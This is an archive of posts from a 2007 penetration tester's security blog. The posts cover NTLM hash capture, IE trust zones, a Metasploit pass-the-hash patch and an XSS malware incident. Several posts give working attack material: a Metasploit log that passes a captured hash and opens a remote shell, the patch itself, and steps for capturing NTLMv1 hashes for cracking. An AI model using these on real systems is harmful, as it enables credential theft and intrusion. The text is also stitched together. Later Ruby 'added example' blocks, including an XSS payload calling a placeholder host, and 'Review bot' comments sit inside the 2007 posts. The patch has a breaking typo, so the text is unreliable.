Thursday, November 15, 2007

IE Trust Zones

This week is the joint OWASP/WASC conference in San Jose. Two days of web app nerds getting together and exchanging ideas about CSRF protections, web services, the Samy worm, etc. It's loads of fun! I'm a big OWASP supporter and push their information wherever possible. I'm always shocked when I hear "I've never heard of them" from a developer.

Rsnake gave a presentation/rant about the sorry state of web security. Not that it's something that was created out of malice, just that we're seeing issues today that were never part of the original concept of the web. Just like spam was never on the minds of Ray and Dick when they created electronic mail.

He briefly mentioned one of my favorite topics - Windows hashes. Then I read his blog entry describing Natron's ideas for using DNS Pinning to affect the IE Trust Zone. It's an area I was thinking of but hadn't worked on yet because I was focused on the insider attack space. Awesome!

Of course there are a few complications with the theory that have to be considered:
  1. If the attacker doesn't send the domain name in the Type message that the victim's computer is a member of, a dialog box will appear. People may still put their passwords in but the idea of mass transparent authentication capture isn't there.
  2. IE Trust Zones are pretty awkward in design. What constitutes an Intranet Zone site? Microsoft KB174360 says: By default, the Local Intranet zone contains all of the network connections that were established by using a Universal Naming Convention (UNC) path, and Web sites that bypass the proxy server or have names that do not include periods (for example, http://local), provided that they are not assigned to either the Restricted Sites or Trusted Sites zone.
  3. If a company is using a proxy server and you DNS Pin a name that doesn't have a FQDN at the end, that address may never be reached because IE won't use the defined proxy and will instead attempt to connect directly to the attacker's IP address.
Another option I was thinking of would be somehow creating a Java or Flash proxy server but unfortunately their sandboxes have locked down any bind requests (unless someone has some mojo that gets around this). Flash doesn't support it and Java doesn't permit binds in applets.
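As an added example (my own illustration, not Microsoft's logic or any code from this post), here is a small Ruby model of the Local Intranet zone rules quoted from KB174360 in point 2, plus the direct-connection behaviour from point 3. It is useful on the defensive side for asking which of the hostnames seen in proxy logs a domain-joined IE would hand credentials to without a prompt. Wildcard matching ("*.corp.example") in the proxy exception list and the sample host list are assumptions made for illustration.

```ruby
# Added example, not Microsoft's code: a model of the Local Intranet zone
# rules quoted from KB174360. Glob handling of the proxy exception list and
# the sample hosts below are assumptions for illustration.

# Case-insensitive glob match where '*' matches any run of characters.
def glob_match?(pattern, host)
  re = Regexp.new('\A' + Regexp.escape(pattern).gsub('\*', '.*') + '\z', Regexp::IGNORECASE)
  re.match?(host)
end

# Assign a zone to +target+, a hostname ("fileserver", "www.example.com") or a
# UNC path ("\\\\server\\share"). Precedence follows the KB text: an explicit
# Restricted/Trusted assignment wins; then UNC paths, dotless names and names
# that bypass the proxy fall into Intranet; everything else is Internet.
def ie_zone(target, trusted: [], restricted: [], proxy_bypass: [])
  t = target.downcase
  return :restricted if restricted.any? { |p| glob_match?(p, t) }
  return :trusted    if trusted.any?    { |p| glob_match?(p, t) }
  return :intranet   if t.start_with?('\\\\')       # UNC path
  return :intranet   unless t.include?('.')          # dotless, e.g. http://local
  return :intranet   if proxy_bypass.any? { |p| glob_match?(p, t) }
  :internet
end

# Point 3 above: with "Bypass proxy server for local addresses" on, a dotless
# name (or one on the exception list) is fetched directly rather than through
# the proxy, so the client must be able to route to that address itself.
def direct_connection?(target, proxy_bypass: [], bypass_local: true)
  t = target.downcase
  (bypass_local && !t.include?('.')) || proxy_bypass.any? { |p| glob_match?(p, t) }
end

# Hosts that land in the Intranet zone and so receive an automatic logon
# under the default "Automatic logon only in Intranet zone" setting.
def auto_logon_hosts(hosts, **policy)
  hosts.select { |h| ie_zone(h, **policy) == :intranet }
end

# Constructed sample: hostnames as they might appear in a proxy log, with a
# made-up exception list and one Trusted Sites entry.
SAMPLE_HOSTS  = %w[fileserver intranet.corp.example www.example.com updates.vendor.example payroll].freeze
SAMPLE_POLICY = { proxy_bypass: ['*.corp.example', '10.*'], trusted: ['updates.vendor.example'] }.freeze

if __FILE__ == $0
  auto_logon_hosts(SAMPLE_HOSTS, **SAMPLE_POLICY).each do |h|
    puts "#{h}: Intranet zone, fetched #{direct_connection?(h, proxy_bypass: SAMPLE_POLICY[:proxy_bypass]) ? 'directly' : 'via proxy'}"
  end
end
```

Run against a real exception list pulled from the proxy configuration, the Intranet set is exactly the set of names for which a relayed or spoofed host could collect an NTLM response silently; shrinking that set (explicit Trusted/Restricted assignments, no dotless names on the bypass list) is the corresponding mitigation.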

In any event the patch to Metasploit adding NTLM type message parsing was submitted back in October. I have some updates to send in but it's still functional. The pre-defined nonce hash catcher (pokehashball.rb) script is fairly complete and the HTTP-to-POP3 tool (psyduck-pop3.rb) is fun to play with. None of these attacks have been incorporated into Metasploit modules yet but that's still on the radar (smb_relay via HTTP).

Visit http://grutz.jingojango.net/exploits/pokehashball.html for the code.

Full Disclosure: This attack was first documented by Jesse Burns at iSec Partners using jCIFS. Where's your code, Jesse? :)

Friday, October 26, 2007

Announcing BerkSec

Continuing the tradition of (NY|Chi|Bay|*)Sec groupings of infosec people without a vendor bent, announcing BERKSEC 0001 - just because, why not, it's not in SF.

Come on by the Albatross Pub on Tuesday, Oct 30 at 7:30 or 8pm or later... Look for the long haired guy with a Toorcon t-shirt and join us.

Thursday, October 25, 2007

NTLM Hash Update

Things got a little busy/crazy around here so I'm not satisfied with what I have done so far so no code yet. This past weekend was Toorcon 1001 and it was as enjoyable as ever. I had a few breakthrough ideas thanks to the talks and side chats with everybody. That's mostly why I'm not satisfied -- always room for improvement. :)

I promise to show something soon. Really.

Friday, October 12, 2007

NTLM Hashes Like Pokemon

I recently finished up a patch to Metasploit that processes NTLM Type Messages. These are the negotiated messages when authenticating to HTTP(S), IMAP, POP3 or SMTP. If you follow the svn trunk of Metasploit the support is there. Hopefully this weekend I'll finalize everything for a cool release.
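As an added example (written for this page; it is not the Metasploit patch, pokehashball.rb, or any code from the posts), here is a Ruby decoder for the three NTLMSSP "Type" messages this post and the later IE Trust Zones post talk about. On the defensive side the same parser is what you run over proxy or mail-server logs to see which target name a challenge advertised (point 1 of the Trust Zones post: the Type 2 target name has to match the victim's domain or the user gets a dialog), which account answered, and whether the answer was a 24-byte NTLMv1 response, the kind a pre-defined challenge makes crackable. Field offsets follow the public NTLMSSP message layout; the sample exchange is constructed here, not captured traffic.

```ruby
# Added example, not the Metasploit patch or pokehashball.rb: decode NTLMSSP
# Type 1/2/3 messages as carried in HTTP Authorization / WWW-Authenticate
# headers (and in the equivalent IMAP/POP3/SMTP AUTH NTLM exchanges).
# Layout: 8-byte "NTLMSSP\0" signature, uint32 message type, then "security
# buffers" of (length u16, maxlength u16, offset u32) pointing at payload bytes.
require 'base64'

NTLM_SIG = "NTLMSSP\x00".b.freeze
NEGOTIATE_UNICODE = 0x00000001

# Read the security buffer at +pos+ and return the bytes it points to.
def ntlm_secbuf(msg, pos)
  return ''.b if msg.bytesize < pos + 8
  len, _maxlen, off = msg[pos, 8].unpack('vvV')
  msg[off, len] || ''.b
end

# Strings are UTF-16LE when the UNICODE flag was negotiated, else OEM text
# (treated as plain ASCII here).
def ntlm_str(bytes, flags)
  src = (flags & NEGOTIATE_UNICODE) != 0 ? 'UTF-16LE' : 'ASCII-8BIT'
  bytes.dup.force_encoding(src).encode('UTF-8', invalid: :replace, undef: :replace)
end

# Parse one message given as raw bytes or as the base64 text that follows
# "NTLM " in a header. Returns a Hash of the fields a log reviewer wants.
def parse_ntlm(data)
  msg = data.b.start_with?(NTLM_SIG) ? data.b : Base64.decode64(data)
  raise ArgumentError, 'not an NTLMSSP message' unless msg.start_with?(NTLM_SIG)
  raise ArgumentError, 'truncated NTLMSSP message' if msg.bytesize < 16
  type = msg[8, 4].unpack1('V')
  case type
  when 1   # negotiate: flags, optional OEM domain and workstation
    { type: 1, flags: msg[12, 4].unpack1('V'),
      domain: ntlm_secbuf(msg, 16), workstation: ntlm_secbuf(msg, 24) }
  when 2   # challenge: target name, flags, 8-byte server challenge
    raise ArgumentError, 'truncated Type 2 message' if msg.bytesize < 32
    flags = msg[20, 4].unpack1('V')
    { type: 2, flags: flags,
      target_name: ntlm_str(ntlm_secbuf(msg, 12), flags),
      challenge: msg[24, 8].unpack1('H*') }
  when 3   # authenticate: LM/NT responses, domain, user, workstation, flags
    flags = msg.bytesize >= 64 ? msg[60, 4].unpack1('V') : NEGOTIATE_UNICODE
    nt = ntlm_secbuf(msg, 20)
    { type: 3, flags: flags,
      domain: ntlm_str(ntlm_secbuf(msg, 28), flags),
      user: ntlm_str(ntlm_secbuf(msg, 36), flags),
      workstation: ntlm_str(ntlm_secbuf(msg, 44), flags),
      lm_response: ntlm_secbuf(msg, 12).unpack1('H*'),
      nt_response: nt.unpack1('H*'),
      # a 24-byte NT response is NTLMv1 (DES over the challenge, crackable
      # offline against a fixed challenge); anything longer is an NTLMv2 blob
      ntlm_version: nt.bytesize == 24 ? 1 : 2 }
  else
    raise ArgumentError, "unknown NTLMSSP message type #{type.inspect}"
  end
end

# Strip the scheme word from a header value and parse what follows.
def parse_header(value)
  parse_ntlm(value.sub(/\ANTLM\s+/i, ''))
end

# Builders used only to construct the sample exchange below.
def build_type2(target, challenge, flags = NEGOTIATE_UNICODE)
  name = target.encode('UTF-16LE').b
  NTLM_SIG + [2].pack('V') + [name.bytesize, name.bytesize, 32].pack('vvV') +
    [flags].pack('V') + challenge.b + name
end

def build_type3(domain, user, workstation, lm_resp, nt_resp, flags = NEGOTIATE_UNICODE)
  bufs = [lm_resp.b, nt_resp.b] + [domain, user, workstation].map { |s| s.encode('UTF-16LE').b }
  hdr = ''.b
  payload = ''.b
  bufs.each do |b|                       # LM, NT, domain, user, workstation
    hdr << [b.bytesize, b.bytesize, 64 + payload.bytesize].pack('vvV')
    payload << b
  end
  hdr << [0, 0, 64 + payload.bytesize].pack('vvV') << [flags].pack('V')  # empty session key, flags
  NTLM_SIG + [3].pack('V') + hdr + payload
end

# Constructed sample (not captured traffic): a challenge naming the CORP
# domain with the fixed nonce 1122334455667788, answered by jdoe on WS01
# with 24-byte, NTLMv1-length responses.
SAMPLE_TYPE2 = 'NTLM ' + Base64.strict_encode64(build_type2('CORP', ['1122334455667788'].pack('H*')))
SAMPLE_TYPE3 = 'NTLM ' + Base64.strict_encode64(build_type3('CORP', 'jdoe', 'WS01', ['aa' * 24].pack('H*'), ['bb' * 24].pack('H*')))

if __FILE__ == $0
  p parse_header(SAMPLE_TYPE2)
  p parse_header(SAMPLE_TYPE3)
end
```

Two fields matter most when reviewing an exchange like this: the Type 2 target name (is it your domain, and did a host outside your network send it?) and the NT response length in the Type 3 (24 bytes means NTLMv1 was allowed, which is the setting to turn off).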

Friday, August 24, 2007

VMWare Fusion Doesn't Play Nice With BPF

For a while now I've been avoiding a problem with Nmap and OS/X w/ VMWare Fusion installed. It's been posted about a few times on the mailing list and I always say "just shut Fusion down for it to work." Yeah, it works but it's not a real solution.

So I spent a few minutes today to figure out just WHY this is happening. Turns out my original assumption of Fusion not building "valid" interfaces is partly correct. The "vmnet[x]" interfaces cannot be opened with BPF! I wrote a quick program to check it out:
    macpro:~ grutz$ sudo ./testbpf vmnet8
    ERROR: Device not configured

ktrace validates:

    2721 testbpf CALL ioctl(0x83,0x8020426c ,0xbffffb28)
    2721 testbpf RET ioctl -1 errno 6 Device not configured
So VMWare isn't creating valid interfaces. No tcpdump for you (and no nmap)! The solutions so far have been to shut down the interfaces but what if you need to keep Fusion up and running?

Here's a quick and dirty patch applied to tcpip.cc that will skip over the vmnet interfaces. Until Fusion fixes their setup this is the only way it'll work.
    /* skip broken VMWare Fusion vmnet interfaces */
    #ifdef MACOSX
    if (strncmp(ifr->ifr_name, "vmnet", 5) == 0)
        continue;
    #endif
Sigh.

Wednesday, August 08, 2007

Chaos Camp 2007: The beginning!


Short and brief here. Surprisingly we all made it here in time to defend our freedoms and set up camp before another group could claim it. Of course since we're the American Embassy here we would've taken the land anyways. We're Americans, what's yours will soon be ours!!

To be honest I'm really amazed at everything here. The people are awesome, the environment couldn't be better and the number of unique camps, activities and talks available simply cannot be beat. If you're awake at 4am PST you can watch the talks live at http://events.ccc.de/camp/2007/Streams

Sunday, July 29, 2007

Defcon and Chaos Camp 2007


This weekend is DefCon 16. All signs say this year is going to be just as big, if not bigger, than it's been in the past. Part of me misses the Alexis Park experience. It felt more homely, more tightly knit together than at a casino. Maybe it's just me. :)

I'll also be a part of the Hackers on a Plane! We're flying right after DC to the Chaos Computer Camp. I've lamented often to friends on how disjointed we are, specifically within the Bay Area, as a community of hackers. I'm not one to talk because I'm just as bad about staying home and keeping things to myself as the rest of us. Hopefully CCC.de will help invigorate me to make some changes. This little spot on the Internet has helped a little. I no longer feel like an evil anti-social hacker -- ok, maybe a little.

Hope to see everyone there!

Thursday, July 19, 2007

eEye's BinDiffing Suite for IDA Pro 5.1

It's been a while since I've posted anything, mostly because I've been very busy changing jobs, starting a penetration testing group from the ground up. That plus all the initial new employee training have eaten up a lot of my time.

One thing we'll be doing is Binary Diffing. I fully believe every good penetration tester should be able to understand assembly, research new vulnerabilities and reverse engineer in some capacity. A good binary diffing program helps a LOT!

While I was waiting for our purchasing department to order Sabre's BinDiff I took a look at eEye's BinDiffingSuite. With my copy of IDA 5.1 installed I downloaded the tool and started the installation. I'm soon greeted with a message saying:

...requires requires IDA Pro Standard v5.0 or IDA Pro Advanced v5.0

During this month's eEye vulnerability forum I asked if there were any plans to update the tool to support IDA 5.1. Hackers take note - Alex's response is "We all use 5.0 here and it works well." Uh, aren't there known vulnerabilities against IDA 5.0? Are you guys running outdated software?!

Flame baiting aside, the MSI file is doing a very simple check for installed IDA versions. Here's how you can get it installed and running with the latest (and more secure.. ahem) version of IDA. The IDA SDK has been pretty stable since v4.9 so the suite works with v5.1 without hassle:
  1. Open RegEdit and go to the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IDA Pro_is1
  2. Change the DisplayName to say "IDA Pro Standard v5.0" or "IDA Pro Professional v5.0"
  3. Re-run BinDiffSuite.exe and install
  4. Change it back to what it was previously (if you want)
  5. Have fun!
This really is a nice suite of tools. Big kudos to eEye for releasing it and including source code!

Wednesday, May 23, 2007

Intel ISACA Intel ISACA Inside

In today's San Francisco Chronicle, David Lazarus writes on how Intel protects its trademarked name. I found it funny in relation to my friend's little ISACA episode I posted about. I can understand that a company has to be vigilant in ensuring somebody isn't devaluing their name or causing consumer confusion, but some things are just a little too surreal.

In this case Intel is saying a woman whose business is selling houses in the VA/DC/MD area can't use the name "IntelAgent" because it would likely cause confusion. Their option was to use "IntelliAgent" since the intent was to combine the words "Intelligent" and "Agent" together - IntelAgent!

Of course "IntelliAgent" works if you're from the south where extra syllables (syl-ah-buhls) are added willy-nilly. IntelliAgent (in-tell-ee-ah-gent), "I is intelliagent."

Wednesday, May 09, 2007

Pass The Hash Support for Metasploit

Surprisingly Metasploit 3's SMB auth routines didn't support "pass the hash" so I took some time and put it in.
msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(ms06_040_netapi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Doing pass the hash.
[*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61
[*] NT: A4141712F19E9DD5ADF16919BB38A95C
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (192.168.110.1:42485 -> 192.168.110.130:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
The Patch:

Index: lib/rex/proto/smb/client.rb
===================================================================
--- lib/rex/proto/smb/client.rb (revision 4889)
+++ lib/rex/proto/smb/client.rb (working copy)
@@ -568,8 +568,13 @@

raise XCEPT::NTLM1MissingChallenge if not self.challenge_key

- hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
- hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ if (pass.length == 65)
+ hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.challenge_key)
+ hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.challenge_key)
+ else
+ hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
+ hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ end

data = ''
data << hash_lm
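Review bot: `CRPYT.e_p24` on the new `hash_nt` line is a typo for `CRYPT`, so the moment a 65-character LM:NT value is supplied this branch raises NameError before any response is built; the pass-the-hash path cannot have run as posted, so please fix it and exercise the branch before committing. The `pass.length == 65` test is also a weak discriminator: a genuine 65-character password would be routed into the hash path, so matching the shape (`pass =~ /\A\h{32}:\h{32}\z/`) is safer, and `pass.upcase()[33,65]` reads as a 65-character slice where `[33,32]` says what is meant. The `pack('H42')` deserves a comment: Ruby pads the 32 hex digits out to 21 bytes, which is the zero-padded block e_p24 expects, but a reader seeing 42 rather than 32 will assume an error.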
@@ -690,7 +695,11 @@
nonce = CRYPT.md5_hash(self.challenge_key + client_challenge)

# Generate the NTLM hash
- resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ if (pass.length == 65)
+ resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), nonce[0, 8])
+ else
+ resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ end

# Generate the fake LANMAN hash
resp_lmv2 = client_challenge + ("\x00" * 16)
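Review bot: the 65-character check and the `[ pass.upcase()[33,65] ].pack('H42')` padding are copied from the first hunk rather than shared; a single helper that turns `pass` into the LM and NT hash blocks (from either a password or an LM:NT string) would keep the NTLMv1 and NTLM2-session paths in step and would have caught the `CRPYT` typo that appears only in the first copy. Leaving `resp_lmv2` untouched is correct here, since in the NTLM2 session response the LM field carries the client challenge rather than a hash-derived value.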

Tuesday, May 08, 2007

ISACA ISACA ISACA

Yesterday a friend of mine related a rather interesting tale. Like a lot of security-minded individuals he owns a domain and uses a unique username when giving out an e-mail address. Like "bugtraq@hisdomain.com" or "amazon@hisdomain.com" etc. The idea is when you receive spam for that username you can easily figure out who it was that released your e-mail address and reprimand, sue, jump up and down in a frenzy, and so on.

He recently passed the CISM exam from ISACA. He hadn't heard anything from them for a while so he calls them up. The conversation goes a little like this:

Him: Hi, I haven't received anything about my CISM. You said I passed but I don't have a certificate or anything yet.

ISACA: That's not right, let me look up your information. What's your (blah blah blah)

ISACA: Oh. I see, you're using ISACA in your e-mail address. That's trademarked and you can't do that.

Him: Really? That's really a strange policy. Make it hisname-ISACA@hisdomain.com then.

ISACA: I'm sorry, that's still in violation of the trademark.

Him: I don't beli... Fine, just remove the e-mail address entirely.

ISACA: But then we have no e-mail address and can't complete your certification.


I'm no lawyer but I believe in order to be violating a Trademark there has to be some potential or perceived confusion in the marketplace. At least that's how I read 15 U.S.C. 1125(c). If my friend's intent was to market himself as ISACA@hisdomain.com as being the real ISACA then I could see there being a clear violation that should be legally challenged.

There is a "Cyberprivacy" section of 1125(c) but that deals only with DOMAIN NAMES and not the username portion of an e-mail address. Also there's this little tidbit:
(i) has a bad faith intent to profit from that mark, including a personal name which is protected as a mark under this section;
How can ISACA really know his intent? I don't really understand the thought process that any mention of ISACA without the ® sign means the user is an infringer. Anyone?

Tuesday, April 24, 2007

NTLMv1, Metasploit and You

In Metasploit 2.7 there existed a module called "smb_sniffer" that listened as a Windows SMB server, responded to negotiations with a preset challenge and forced crypto to NTLMv1. When I asked the devs about it they said it was for "future purposes."

That future purpose is now documented!

Step 1 - Download my slightly updated version from here and place it in your exploits/ directory.

Step 2a - Run it with root privs on a UNIX host (doesn't work on Windows, sorry).
Step 2b - Have a Windows machine connect to your "share" - they will get an access denied but stuff like will work.


Step 3 - Send the hashes to Cain & Abel for cracking or cryptanalysis! Obtain the HALFLMCHALL tables from FreeRainbowCrack.Com or run a brute force, dictionary, hybrid, etc.


Step 4 - Success!


One caveat -- the half-lm challenge table only does the first 7 characters of LANMAN. You still have to brute force the last 7 and if the user's password is greater than 14 characters, you're really out of luck.

Enjoy! :)

Friday, April 13, 2007

Frameworks are not auto-hackers

I was reading a review of the Yoggie Gatekeeper Pro in this month's SC Magazine. It's a neat little device that hides your PC behind a Linux firewall-appliance when connecting to an untrusted network. The voodoo of how it shims itself into your Windows networking stack so you can connect to a wireless network and still be protected through the Yoggie aside -- one thing about the review really made my hair bristle:
Using our vulnerability assessment tool (NetClarity) and our penetration tool (Core Impact) we were unable to compromise the Gatekeeper or the computer behind it.
- SC Magazine, April 2007, Pg 63
Well duh.

Both the tools listed are only as strong as their signatures, exploits and platform shellcode. That statement is like running Core Impact against a copy of OpenVMS and saying IMPENETRABLE! when you're done. Technically it's valid but it's no measure of strength.

Maybe these statements are made because of a contractual obligation. "Say our product name five times and we'll give you free copies" sort of thing. Unfortunately there will be InfoSec managers and the like who will listen and wonder if maybe they should use these tools in lieu of hiring security professionals who actually know something.

Maybe I'm just being overly critical and hypersensitive about this. I don't think I am, as I've looked at a number of Web Application Security tools on the market and none of them has been able to find the more serious vulnerabilities that a team of two or three highly skilled testers finds. We still need good QA, but attack frameworks like CORE Impact, Canvas and Metasploit aren't automated tools. Don't treat them as such.

Wednesday, March 28, 2007

Security Opus - a week later

Security Opus rocked. Very laid back attitude (hey, it's San Francisco). Free drinks every night - thanks Microsoft, Richard and other sponsors! Great speakers and talks. Networking with friends in a relaxing environment. We'll do it again in September I think. BE THERE!

Some of the topics you missed that I liked (and can remember right now):
  • Stefano Zanero ranted about Intrusion Detection|Prevention Systems. Stuff many of us have been saying for a long time like "Real-time response is not really possible" but he had the math and pretty graphs to prove it to management. IDS isn't dead but it's never been a killer app in my opinion. It is still very important to have in any environment.
  • Cedric Blancher's presentation on 802.11 security was insightful and I spoke with a few people who hadn't yet heard about all of the attacks before.
  • Shawn Merdinger from VOIPSA showed a few of VoIP's problems. He's primarily focused on client/handset issues vs protocol weaknesses or server issues but his liquid-fueled talk was informative and put the spark back in me to finish setting up an Asterisk server. So many projects, so little time!
  • Matt Hargett and Luis Miras have very strong opinions on source code analysis for vulnerabilities. It's a topic I'm looking into this year for work and understand it's a very difficult problem with no real good answer.
  • Whoever named it "Web 2.0" should stop trying to name things. I'm tired of seeing crap about "Web 2.0". Every time somebody says it in a presentation, God kills a puppy or kitten from a no-kill shelter.
There were other talks about cryptovirology, botnets, etc. Show your support and come in September. My favorite quote from Richard Thieme: "Foreclose on the antelope!"

Richard cracks me up sometimes, especially when he and Simple Nomad get to talking about UFOs and secret government projects (last year's SecurityOpus).

In other news, some more projects, exploits and scripts will be uploaded sometime this week when I get around to cleaning them up. It's been a busy week.

Thursday, March 08, 2007

Exploit frameworks are the best

This week I wrote an exploit for a JRun vulnerability released in 2002! I was proud of myself as we rarely get the chance to write an overflow during a penetration test. Usually it's all web exploits, unpatched windows systems, poor administration, etc. My friend said we found "the oldest box on his network." So much for "no public exploits exist" as a mitigation! HA!

The hardest part of all this was getting a copy of the JRun software installed and running in a VM. It was so old the company (Allaire) had been bought twice so no installers could easily be found! A few hurdles later and within half a day I had a stable module written for Metasploit. Later in the evening I wrapped one up for Canvas. I don't have a copy of CORE Impact - it's a little expensive and, well, we do alright with what we have. :)

Dave Aitel once said he envisioned a future of exploit writing becoming a marketplace where they can be sold by third parties like ActiveX objects were in the early days of IE. Needed to do some video? Here's a library that'll help!

To be honest I don't see that happening. There's little value for me to spend some amount ($100 to $5000?) for a single exploit that may or may not work to "prove" the system is vulnerable. There's so much wiggle area when exploiting a system, even with the protections provided by today's frameworks, that it'll just be too unreliable. I'd have a hard time justifying the cost but maybe that's just me.

There's been talk on the Metasploit mailing list of putting together an exploit module repository. Something centralized that can be maintained by developers. I've been searching for a project, maybe this will be it. :) Anyone else that's interested drop me a line. I envision a Trac Wiki + SVN repository with some core supporters and community submissions/requests. Of course we'll have to weed out the 100s of "writemesumthin 2 hax myspace/yahoo/aim" but that's part of the fun!

Until then.. enjoy my meager contributions: http://grutz.jingojango.net/exploits/

SecurityOPUS is coming up March 19-21 here in San Francisco. It's an awesome conference and I highly recommend coming -- registration is still open. We don't have many get-togethers here for some reason other than big marketing events like RSA. There's a lot of talent in the bay area and this is a great way for the security community to come together more. Come! Learn! Enjoy! Eat some great food on Rich's dime! Then later come to our OWASP meetings. They're lots of fun and free beer when iSEC Partners hosts. :)

Wednesday, February 21, 2007

Google Desktop? Upgrade time!

The security freaks at Watchfire recently released an amazing piece of research against Google Desktop. If you use this product it's best to update it now.

PDF and an awesome Adobe Flash presentation are worth checking out.

Essentially through Cross-site Scripting and a Javascript command and control API they've shown the ability to fully compromise a device. All of it can be automated.

As a web user I've been afraid of client-side language interpreters for a long time. Javascript, ActiveX, Java, etc -- they take too much control away from my PC and give it to web servers. Blogs, forums, malicious trojan servers, etc all can carry dangerous payloads that will run unnoticed to me because that's how the user experience is.

This year is going to be fun. :)

Friday, February 02, 2007

Owning a lot of football fans

This morning I awoke to find an urgent posting from Websense. Somebody had placed a bit of JavaScript on the Dolphin Stadium website @ http://www.dolphinstadium.com/. Don't worry, it's not there anymore. This weekend is the Superbowl and a LOT of football fans could very well visit this site, and if they haven't updated their Internet Explorer in a while they'd find a keylogger and backdoor installed on their PC.

A pretty big issue that was resolved fairly quickly by the host removing the offending source but our comfort level with that site is shaky now. How did the attackers get in, did they close the hole or just put some silly putty over it? We may never know.

The malicious code turns out to be a javascript file called 3.js loaded from a website named dv521.com. A very quick googledork search found something interesting:



The CDC's podcast site! They've since brought down their system for repairs.

The dv521.com site has been removed as well but how many people already had their machines trojaned?

This attack is called "Persistent Cross Site Scripting (XSS)", in that the malicious JavaScript code gets left behind on the web application, usually as a database entry that is displayed at some point during the user's experience. When somebody goes to visit the website the malicious code is loaded and, in this particular case, bad things happen to the browser if it hasn't been patched against two recent Microsoft bugs (MS06-014 and MS07-004).
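As an added example (my own illustration, not code from this post or from the compromised site), here is the persistent XSS pattern just described in miniature in Ruby: the stored entry, the rendering that executes it for every visitor, the output-escaping fix, and a triage helper for finding injected entries in stored content after an incident. The stored comments are constructed and the script host is a placeholder, not the dv521.com domain named above.

```ruby
# Added example, not code from the post: persistent XSS in miniature.
# STORED_COMMENTS is constructed; attacker.invalid is a placeholder host.
require 'cgi'

# What visitor-supplied comments look like once they sit in the database.
STORED_COMMENTS = [
  'Great game last week!',
  '<script src="http://attacker.invalid/3.js"></script>',   # injected entry
  'Go <b>Dolphins</b>'
].freeze

# Vulnerable rendering: stored text is interpolated into the page as-is, so
# every visitor's browser fetches and runs the injected script.
def render_unsafe(comments)
  comments.map { |c| "<li>#{c}</li>" }.join("\n")
end

# Hardened rendering: escape on output. The injected entry is still shown,
# but as inert text, because <, >, " and & become character entities.
def render_safe(comments)
  comments.map { |c| "<li>#{CGI.escapeHTML(c)}</li>" }.join("\n")
end

# Triage helper for auditing stored content after an incident like this one:
# flag entries containing a script element, an inline event handler or a
# javascript: URL. Crude by design; escaping on output is the real fix.
def suspicious_entries(comments)
  comments.select { |c| c.match?(/<script\b|\bon\w+\s*=|javascript:/i) }
end

# Pull the remote script hosts out of flagged entries so they can be blocked
# and searched for on other sites (the search step the post describes).
def remote_script_hosts(comments)
  comments.flat_map { |c| c.scan(/<script[^>]*\bsrc\s*=\s*["']?(?:https?:)?\/\/([^\/"'\s>]+)/i).flatten }.uniq
end

if __FILE__ == $0
  puts render_safe(STORED_COMMENTS)
  puts "flagged: #{suspicious_entries(STORED_COMMENTS).size}, hosts: #{remote_script_hosts(STORED_COMMENTS).join(', ')}"
end
```

Escaping on output also neutralises the harmless "<b>" in the third comment; if a site needs to allow some markup, it must pass stored content through an allowlist sanitiser rather than trusting it because it came from its own database.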

There are a lot of XSS bugs out there. Michael Sutton did a massive check and reliably confirmed that out of 272 sites, 47 (17.3%) of them had an XSS vulnerability. The XSS Wall of Shame at the sla.ckers.org forum never stops, most of them being non-persistent.

Browsing the web with a JavaScript-enabled browser is just plain dangerous. It's not just those 'seedy' underground sites you should avoid, it's everywhere.

Some very good resources on XSS and its very real threats:

Thursday, January 25, 2007

How to kill an Internet Domain

Yesterday in a posting to the nmap-hackers mailing list, Fyodor described a very chilling attack against his domain. This wasn't a technical attack, it didn't require any special software or programming knowledge. All it took was that you have a name behind you to bully somebody else.

I woke up yesterday morning to find a voice message from my domain registrar (GoDaddy) saying they were suspending the domain SecLists.org. One minute later I received an email saying that SecLists.org has "been suspended for violation of the GoDaddy.com Abuse Policy". And also "if the domain name(s) listed above are private, your Domains By Proxy(R) account has also been suspended." WTF??! Neither the email nor voicemail gave a phone number to reach them at, nor did they feel it was worth the effort to explain what the supposed violation was. They changed my domain nameserver to "NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM". Cute, eh?

What could possibly cause such a response? The storage of the public mailing list (Full Disclosure) for all to see via HTTP or RSS-feeds.

A user on 01/15/07 posted a long text file of phished Myspace accounts which included e-mail addresses and passwords. This kind of data is often traded in underground circles, usually free porn logins, but rarely do we see these things so brightly displayed for all to see and archive.

Full Disclosure is freely open to all. It's supposed to be that way for a multitude of reasons. Unfortunately this means child-minded individuals sometimes feel it's their duty to troll. Fyodor recently has been the receiver of DMCA requests from the infamous Michael Crook to remove posts from SecLists.org, claiming to hold the copyright of a picture of a penis posted by previously mentioned trolls.

Because Michael Crook is not the Fox Corporation he couldn't sufficiently bully a domain provider into closing down a domain and potentially all other registered domains. Lucky for all of us.

